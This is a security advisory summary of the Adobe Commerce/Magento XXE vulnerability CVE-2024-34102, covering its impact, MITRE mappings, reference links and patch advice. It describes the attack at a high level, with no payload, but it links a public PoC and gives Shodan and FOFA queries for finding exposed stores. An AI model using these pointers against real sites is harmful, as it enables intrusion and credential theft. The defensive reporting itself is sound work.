A critical XML External Entity Reference (XXE) vulnerability (CVE-2024-34102) affects Adobe Commerce and Magento Open Source, potentially allowing unauthorized file access, SSRF, and even remote code execution. Exploitation can expose sensitive files (like app/etc/env.php) and enable privileged API access; remediation is strongly advised with upgrades across affected versions. #CVE-2024-34102 #AdobeCommerce #MagentoOpenSource #XXE #env.php #Shodan #FOFA
Keypoints
- Critical XXE flaw (CVE-2024-34102) found in Adobe Commerce and Magento Open Source with CVSSv3 9.8.
- Vulnerability enables unauthorized access to private files (e.g., app/etc/env.php) and can lead to arbitrary code execution, feature bypass, and privilege escalation.
- Attack surface includes REST API, GraphQL API, and SOAP API, allowing unauthorized admin access and data disclosure.
- A PoC is publicly available on GitHub; up to 50k exposed Magento/Adobe Commerce instances have been identified in the wild.
- Attack workflow involves crafting malicious XML/DTD payloads to trigger deserialization and exfiltration of sensitive data.
- Mitigations include upgrading to patched versions and SonicWall IPS signature 4462; advisories encourage prompt remediation due to active exploitation in the wild.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – A crafted POST request to a vulnerable Adobe instance with an enabled Magento template is the necessary and sufficient condition to exploit the issue. “A crafted POST request to a vulnerable Adobe instance with an enabled Magento template is the necessary and sufficient condition to exploit the issue.”
- [T1552.001] Credentials in Files – Access to private files such as app/etc/env.php containing cryptographic keys used for authentication. “app/etc/env.php … containing cryptographic keys used for authentication.”
- [T1078] Valid Accounts – Forging administrator tokens and manipulating Magento’s APIs as privileged users. “Unauthenticated actors can utilize this key to forge administrator tokens and manipulate Magento’s APIs as privileged users.”
- [T1041] Exfiltration – Exfiltration of sensitive data (e.g., system password file) to an attacker endpoint. “exfiltrate the contents of the system’s password file from the target server.”
Indicators of Compromise
- [URL] Public vulnerability and PoC references – https://nvd.nist.gov/vuln/detail/CVE-2024-34102, https://github.com/Chocapikk/CVE-2024-34102
- [URL] Exposure and discovery context – https://www.shodan.io/search?query=http.html%3A%22magento-template%22, https://en.fofa.info/result?qbase64=YXBwPSJBZG9iZS1NYWdlbnRvIg%3D%3D
- [URL] Official advisory context – https://helpx.adobe.com/in/security/products/magento/apsb24-40.html
- [File] app/etc/env.php – sensitive credential file referenced by the vulnerability
- [File] /etc/passwd – targeted system password file shown in disclosure figures
Read more: https://blog.sonicwall.com/en-us/2024/07/adobe-commerce-unauthorized-xxe-vulnerability/